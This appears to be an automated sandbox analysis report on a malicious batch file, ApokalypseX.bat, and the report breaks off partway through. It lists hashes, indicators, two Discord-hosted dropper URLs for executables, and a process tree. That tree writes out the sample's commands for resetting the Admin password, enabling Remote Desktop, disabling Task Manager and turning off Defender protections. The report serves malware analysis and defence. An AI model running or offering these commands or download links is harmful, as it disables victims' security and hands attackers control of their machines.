f35b98999496548741f902a7fa25795bcadb43d7839c2acfbfc48c53be4a3be9

Resubmissions

17-05-2024 18:48

240517-xf6l1add77 10

17-05-2024 08:41

240517-klghvahh3x 10

17-05-2024 08:39

240517-kkggfsab38 10

Analysis

max time kernel
924s
max time network
997s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
17-05-2024 18:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ApokalypseX.bat
Size

11KB
MD5

e4adc86d9f409d319c672d7d5384a04e
SHA1

b61144e94b18919b99b3621446a4f85c8838c707
SHA256

f35b98999496548741f902a7fa25795bcadb43d7839c2acfbfc48c53be4a3be9
SHA512

189cd4ac752e2c87209a7a140278195d4a166ecc3d73befa7f91681b393873ea6b4cb4d15766ff3c5fabfeea0d21724c6e75b39c68abfde18c346ee9f2e76395
SSDEEP

192:zxR/b5lT2hCaRWzWXCaRWzWgMoUWqe71uQNVyRhb+/yB3fZlo0o/hr+pMnKFYjQS:dRnqhCD6XCD6gMOuCVyRhb+/yB3fZejb

Score

10^/10

discovery evasion execution exploit pyinstaller

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1181543227728330774/1237538022371754046/ByteVaultX.exe?ex=66473758&is=6645e5d8&hm=86bba81d6232969cb4ade81e882b8bcee5f5dacefa6cc2ac70ca40db4c969e4c&

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1181543227728330774/1238213032279277699/D34TH_6.0.exe?ex=6647b1bf&is=6646603f&hm=a17f4d5fea737c6a13af1c4e897a50895221d179bd368787d2b09c5647e4daf7&

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

78 1756 powershell.exe
80 4500 powershell.exe
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 7 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

2488 netsh.exe
3920 netsh.exe
4024 netsh.exe
1220 netsh.exe
3092 netsh.exe
4636 netsh.exe
3952 netsh.exe

flow	pid	process
78	1756	powershell.exe
80	4500	powershell.exe

pid	process
2488	netsh.exe
3920	netsh.exe
4024	netsh.exe
1220	netsh.exe
3092	netsh.exe
4636	netsh.exe
3952	netsh.exe

Possible privilege escalation attempt 11 IoCs

exploit

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
10500	takeown.exe
10624	takeown.exe
11112	takeown.exe
11232	takeown.exe
10928	takeown.exe
10828	takeown.exe
14876	icacls.exe
5596	takeown.exe
10340	takeown.exe
4624	takeown.exe
6100	takeown.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation cmd.exe
Drops startup file 1 IoCs

Processes:

cmd.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pcy.bat cmd.exe
Executes dropped EXE 2 IoCs

Processes:

D34TH_6.0.exeD34TH_6.0.exe

pid process

4756 D34TH_6.0.exe
4532 D34TH_6.0.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pcy.bat	cmd.exe

pid	process
4756	D34TH_6.0.exe
4532	D34TH_6.0.exe

Loads dropped DLL 56 IoCs

Processes:

D34TH_6.0.exemsedge.exemsedge.execmd.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exeCompPkgSrv.exeCompPkgSrv.exemsedge.execmd.exeWScript.exeWScript.execmd.exemsedge.exemsedge.exemsedge.exemsedge.execmd.exeWScript.exeWScript.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.execmd.exeWScript.exeWScript.execmd.exemsedge.exemsedge.exe

pid	process
4532	D34TH_6.0.exe
4532	D34TH_6.0.exe
4532	D34TH_6.0.exe
4532	D34TH_6.0.exe
4532	D34TH_6.0.exe
4532	D34TH_6.0.exe
4532	D34TH_6.0.exe
4532	D34TH_6.0.exe
4532	D34TH_6.0.exe
4532	D34TH_6.0.exe
22728	msedge.exe
22728	msedge.exe
22708	msedge.exe
22492	cmd.exe
23388	msedge.exe
23264	msedge.exe
23708	msedge.exe
23388	msedge.exe
23708	msedge.exe
22228	msedge.exe
23264	msedge.exe
22680	msedge.exe
22680	msedge.exe
14784	CompPkgSrv.exe
8436	CompPkgSrv.exe
8312	msedge.exe
8304	cmd.exe
8312	msedge.exe
22004	WScript.exe
14108	WScript.exe
23472	cmd.exe
23964	msedge.exe
23964	msedge.exe
23688	msedge.exe
24476	msedge.exe
24476	msedge.exe
23584	msedge.exe
11360	cmd.exe
9048	WScript.exe
8880	WScript.exe
8788	msedge.exe
8788	msedge.exe
8820	msedge.exe
21752	msedge.exe
4960	msedge.exe
4960	msedge.exe
11732	msedge.exe
21752	msedge.exe
8404	msedge.exe
11920	cmd.exe
1564	WScript.exe
16548	WScript.exe
24600	cmd.exe
24620	msedge.exe
24608	msedge.exe
24620	msedge.exe

Modifies file permissions 1 TTPs 11 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
10500	takeown.exe
10928	takeown.exe
14876	icacls.exe
5596	takeown.exe
6100	takeown.exe
11232	takeown.exe
4624	takeown.exe
10624	takeown.exe
10828	takeown.exe
10340	takeown.exe
11112	takeown.exe

Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 208.67.222.222
Destination IP 208.67.222.222
Destination IP 208.67.222.222

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Command and Scripting Interpreter: PowerShell 1 TTPs 29 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3244	powershell.exe
4428	powershell.exe
2748	powershell.exe
3772	powershell.exe
1912	powershell.exe
1456	powershell.exe
1364	powershell.exe
1988	powershell.exe
4284	powershell.exe
4136	powershell.exe
1936	powershell.exe
4844	powershell.exe
1308	powershell.exe
4500	powershell.exe
1756	powershell.exe
1676	powershell.exe
1592	powershell.exe
4496	powershell.exe
4976	powershell.exe
3856	powershell.exe
3924	powershell.exe
1208	powershell.exe
3164	powershell.exe
4988	powershell.exe
3312	powershell.exe
4308	powershell.exe
3244	powershell.exe
4388	powershell.exe
4276	powershell.exe

Drops file in System32 directory 64 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CertEnrollUI.dll	cmd.exe
File opened for modification	C:\Windows\System32\CompPkgSrv.exe	cmd.exe
File opened for modification	C:\Windows\System32\@language_notification_icon.png	cmd.exe
File opened for modification	C:\Windows\System32\ActivationManager.dll	cmd.exe
File opened for modification	C:\Windows\System32\AdvancedEmojiDS.dll	cmd.exe
File opened for modification	C:\Windows\System32\AppVShNotify.exe	cmd.exe
File opened for modification	C:\Windows\System32\Boot\ja-JP\winload.efi.mui	cmd.exe
File opened for modification	C:\Windows\System32\AppVFileSystemMetadata.dll	cmd.exe
File opened for modification	C:\Windows\System32\atlthunk.dll	cmd.exe
File opened for modification	C:\Windows\System32\AuthBroker.dll	cmd.exe
File opened for modification	C:\Windows\System32\certenc.dll	cmd.exe
File opened for modification	C:\Windows\System32\aadtb.dll	cmd.exe
File opened for modification	C:\Windows\System32\AuthBrokerUI.dll	cmd.exe
File opened for modification	C:\Windows\System32\browserbroker.dll	cmd.exe
File opened for modification	C:\Windows\System32\certprop.dll	cmd.exe
File opened for modification	C:\Windows\System32\config\SYSTEM	cmd.exe
File opened for modification	C:\Windows\System32\bdesvc.dll	cmd.exe
File opened for modification	C:\Windows\System32\AudioSrvPolicyManager.dll	cmd.exe
File opened for modification	C:\Windows\System32\accountaccessor.dll	cmd.exe
File opened for modification	C:\Windows\System32\auditpolmsg.dll	cmd.exe
File opened for modification	C:\Windows\System32\bidispl.dll	cmd.exe
File opened for modification	C:\Windows\System32\CallHistoryClient.dll	cmd.exe
File opened for modification	C:\Windows\System32\CapabilityAccessManagerClient.dll	cmd.exe
File opened for modification	C:\Windows\System32\BluetoothDesktopHandlers.dll	cmd.exe
File opened for modification	C:\Windows\System32\Boot\it-IT\winresume.efi.mui	cmd.exe
File opened for modification	C:\Windows\System32\coloradapterclient.dll	cmd.exe
File opened for modification	C:\Windows\System32\acppage.dll	cmd.exe
File opened for modification	C:\Windows\System32\AppVCatalog.dll	cmd.exe
File opened for modification	C:\Windows\System32\AxInstUI.exe	cmd.exe
File opened for modification	C:\Windows\System32\BackgroundTransferHost.exe	cmd.exe
File opened for modification	C:\Windows\System32\browseui.dll	cmd.exe
File opened for modification	C:\Windows\System32\AboveLockAppHost.dll	cmd.exe
File opened for modification	C:\Windows\System32\AudioEndpointBuilder.dll	cmd.exe
File opened for modification	C:\Windows\System32\Boot\de-DE\winresume.efi.mui	cmd.exe
File opened for modification	C:\Windows\System32\CallButtons.dll	cmd.exe
File opened for modification	C:\Windows\System32\appraiser.dll	cmd.exe
File opened for modification	C:\Windows\System32\BCP47mrm.dll	cmd.exe
File opened for modification	C:\Windows\System32\Boot\it-IT\winload.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\CallButtons.ProxyStub.dll	cmd.exe
File opened for modification	C:\Windows\System32\aeinv.dll	cmd.exe
File opened for modification	C:\Windows\System32\AppVEntSubsystems64.dll	cmd.exe
File opened for modification	C:\Windows\System32\autofmt.exe	cmd.exe
File opened for modification	C:\Windows\System32\Com\en-US\comrepl.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\AppXDeploymentClient.dll	cmd.exe
File opened for modification	C:\Windows\System32\AppxProvisioning.xml	cmd.exe
File opened for modification	C:\Windows\System32\AtBroker.exe	cmd.exe
File opened for modification	C:\Windows\System32\bthudtask.exe	cmd.exe
File opened for modification	C:\Windows\System32\cdpsvc.dll	cmd.exe
File opened for modification	C:\Windows\System32\authfwcfg.dll	cmd.exe
File opened for modification	C:\Windows\System32\Boot\de-DE\winload.efi.mui	cmd.exe
File opened for modification	C:\Windows\System32\Boot\fr-FR\winload.efi.mui	cmd.exe
File opened for modification	C:\Windows\System32\AarSvc.dll	cmd.exe
File opened for modification	C:\Windows\System32\amsi.dll	cmd.exe
File opened for modification	C:\Windows\System32\APHostClient.dll	cmd.exe
File opened for modification	C:\Windows\System32\AppResolver.dll	cmd.exe
File opened for modification	C:\Windows\System32\AppxSysprep.dll	cmd.exe
File opened for modification	C:\Windows\System32\BrowserSettingSync.dll	cmd.exe
File opened for modification	C:\Windows\System32\BWContextHandler.dll	cmd.exe
File opened for modification	C:\Windows\System32\certca.dll	cmd.exe
File opened for modification	C:\Windows\System32\asferror.dll	cmd.exe
File opened for modification	C:\Windows\System32\CameraSettingsUIHost.exe	cmd.exe
File opened for modification	C:\Windows\System32\agentactivationruntime.dll	cmd.exe
File opened for modification	C:\Windows\System32\audiosrv.dll	cmd.exe
File opened for modification	C:\Windows\System32\atl.dll	cmd.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\D34TH_6.0.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exe

pid process

3964 ipconfig.exe
3188 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

4044 systeminfo.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings cmd.exe
Runs net.exe

pid	process
3964	ipconfig.exe
3188	ipconfig.exe

pid	process
4044	systeminfo.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pid	process
1592	powershell.exe
1592	powershell.exe
4844	powershell.exe
4844	powershell.exe
3772	powershell.exe
3772	powershell.exe
1988	powershell.exe
1988	powershell.exe
4284	powershell.exe
4284	powershell.exe
3924	powershell.exe
3924	powershell.exe
1912	powershell.exe
1912	powershell.exe
1456	powershell.exe
1456	powershell.exe
4988	powershell.exe
4988	powershell.exe
4496	powershell.exe
4496	powershell.exe
3244	powershell.exe
3244	powershell.exe
4136	powershell.exe
4136	powershell.exe
4976	powershell.exe
4976	powershell.exe
1936	powershell.exe
1936	powershell.exe
1208	powershell.exe
1208	powershell.exe
4428	powershell.exe
4428	powershell.exe
3856	powershell.exe
3856	powershell.exe
3312	powershell.exe
3312	powershell.exe
1676	powershell.exe
1676	powershell.exe
4308	powershell.exe
4308	powershell.exe
1308	powershell.exe
1308	powershell.exe
1364	powershell.exe
1364	powershell.exe
2748	powershell.exe
2748	powershell.exe
3244	powershell.exe
3244	powershell.exe
3164	powershell.exe
3164	powershell.exe
1756	powershell.exe
1756	powershell.exe
4388	powershell.exe
4388	powershell.exe
4500	powershell.exe
4500	powershell.exe
4276	powershell.exe
4276	powershell.exe
2092	msedge.exe
2092	msedge.exe
2160	msedge.exe
2160	msedge.exe
12524	msedge.exe
12524	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

cmd.exe

pid process

3428 cmd.exe

pid	process
3428	cmd.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

Processes:

msedge.exemsedge.exe

pid	process
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeDebugPrivilege	3924	powershell.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	4988	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	3244	powershell.exe
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	3856	powershell.exe
Token: SeDebugPrivilege	3312	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	3244	powershell.exe
Token: SeDebugPrivilege	3164	powershell.exe
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	4388	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	4276	powershell.exe
Token: SeIncreaseQuotaPrivilege	3792	WMIC.exe
Token: SeSecurityPrivilege	3792	WMIC.exe
Token: SeTakeOwnershipPrivilege	3792	WMIC.exe
Token: SeLoadDriverPrivilege	3792	WMIC.exe
Token: SeSystemProfilePrivilege	3792	WMIC.exe
Token: SeSystemtimePrivilege	3792	WMIC.exe
Token: SeProfSingleProcessPrivilege	3792	WMIC.exe
Token: SeIncBasePriorityPrivilege	3792	WMIC.exe
Token: SeCreatePagefilePrivilege	3792	WMIC.exe
Token: SeBackupPrivilege	3792	WMIC.exe
Token: SeRestorePrivilege	3792	WMIC.exe
Token: SeShutdownPrivilege	3792	WMIC.exe
Token: SeDebugPrivilege	3792	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3792	WMIC.exe
Token: SeRemoteShutdownPrivilege	3792	WMIC.exe
Token: SeUndockPrivilege	3792	WMIC.exe
Token: SeManageVolumePrivilege	3792	WMIC.exe
Token: 33	3792	WMIC.exe
Token: 34	3792	WMIC.exe
Token: 35	3792	WMIC.exe
Token: 36	3792	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3792	WMIC.exe
Token: SeSecurityPrivilege	3792	WMIC.exe
Token: SeTakeOwnershipPrivilege	3792	WMIC.exe
Token: SeLoadDriverPrivilege	3792	WMIC.exe
Token: SeSystemProfilePrivilege	3792	WMIC.exe
Token: SeSystemtimePrivilege	3792	WMIC.exe
Token: SeProfSingleProcessPrivilege	3792	WMIC.exe
Token: SeIncBasePriorityPrivilege	3792	WMIC.exe
Token: SeCreatePagefilePrivilege	3792	WMIC.exe
Token: SeBackupPrivilege	3792	WMIC.exe
Token: SeRestorePrivilege	3792	WMIC.exe
Token: SeShutdownPrivilege	3792	WMIC.exe
Token: SeDebugPrivilege	3792	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3792	WMIC.exe

Suspicious use of FindShellTrayWindow 53 IoCs

Processes:

msedge.exemsedge.exeWScript.exe

pid	process
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
5808	WScript.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

msedge.exemsedge.exe

pid	process
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe
12192	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

D34TH_6.0.exe

pid process

4532 D34TH_6.0.exe
4532 D34TH_6.0.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.execmd.exenet.exenet.exe

description	pid	process	target process
PID 212 wrote to memory of 4752	212	cmd.exe	net.exe
PID 212 wrote to memory of 4752	212	cmd.exe	net.exe
PID 4752 wrote to memory of 2212	4752	net.exe	net1.exe
PID 4752 wrote to memory of 2212	4752	net.exe	net1.exe
PID 2960 wrote to memory of 2244	2960	cmd.exe	net.exe
PID 2960 wrote to memory of 2244	2960	cmd.exe	net.exe
PID 2244 wrote to memory of 4328	2244	net.exe	net1.exe
PID 2244 wrote to memory of 4328	2244	net.exe	net1.exe
PID 2960 wrote to memory of 5088	2960	cmd.exe	net.exe
PID 2960 wrote to memory of 5088	2960	cmd.exe	net.exe
PID 5088 wrote to memory of 3120	5088	net.exe	net1.exe
PID 5088 wrote to memory of 3120	5088	net.exe	net1.exe
PID 2960 wrote to memory of 2748	2960	cmd.exe	reg.exe
PID 2960 wrote to memory of 2748	2960	cmd.exe	reg.exe
PID 2960 wrote to memory of 3244	2960	cmd.exe	reg.exe
PID 2960 wrote to memory of 3244	2960	cmd.exe	reg.exe
PID 2960 wrote to memory of 232	2960	cmd.exe	reg.exe
PID 2960 wrote to memory of 232	2960	cmd.exe	reg.exe
PID 2960 wrote to memory of 1040	2960	cmd.exe	reg.exe
PID 2960 wrote to memory of 1040	2960	cmd.exe	reg.exe
PID 2960 wrote to memory of 1592	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 1592	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 4844	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 4844	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 3772	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 3772	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 1988	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 1988	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 4284	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 4284	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 3924	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 3924	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 3952	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 3952	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 2488	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 2488	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 3920	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 3920	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 4024	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 4024	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 1220	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 1220	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 3092	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 3092	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 4636	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 4636	2960	cmd.exe	netsh.exe
PID 2960 wrote to memory of 1912	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 1912	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 1456	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 1456	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 4988	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 4988	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 4496	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 4496	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 3244	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 3244	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 4136	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 4136	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 4976	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 4976	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 1936	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 1936	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 1208	2960	cmd.exe	powershell.exe
PID 2960 wrote to memory of 1208	2960	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ApokalypseX.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:212

C:\Windows\system32\net.exe
net session
2⤵
- Suspicious use of WriteProcessMemory
PID:4752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:2212

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
1⤵
PID:2620

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ApokalypseX.bat"
1⤵
- Drops startup file
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2960

C:\Windows\system32\net.exe
net session
2⤵
- Suspicious use of WriteProcessMemory
PID:2244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
3⤵
PID:4328

C:\Windows\system32\net.exe
net user Admin D34TH
2⤵
- Suspicious use of WriteProcessMemory
PID:5088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user Admin D34TH
3⤵
PID:3120

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
2⤵
PID:2748

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
2⤵
PID:3244

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
2⤵
PID:232

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
2⤵
PID:1040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
2⤵
